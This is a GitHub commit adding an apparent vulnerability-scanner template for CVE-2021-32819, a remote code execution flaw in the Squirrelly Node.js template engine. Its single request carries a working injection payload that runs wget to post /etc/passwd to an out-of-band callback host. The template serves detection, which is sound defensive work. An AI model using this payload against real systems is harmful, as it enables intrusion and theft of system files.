Create CVE-2021-32819.yaml

patch-1
PikPikcU 2021-08-20 20:19:00 +07:00 committed by GitHub
parent 54737d21bf
commit 611d5f76dd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2021-32819
info:
name: Nodejs squirrelly RCE
author: pikpikcu
severity: critical
description: |
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
reference: |
- https://www.linuxlz.com/aqld/2331.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32819
tags: cve,cve2021,nodejs,rce
requests:
- method: GET
path:
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20--post-file%20/etc/passwd%20{{interactsh-url}}%27);'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"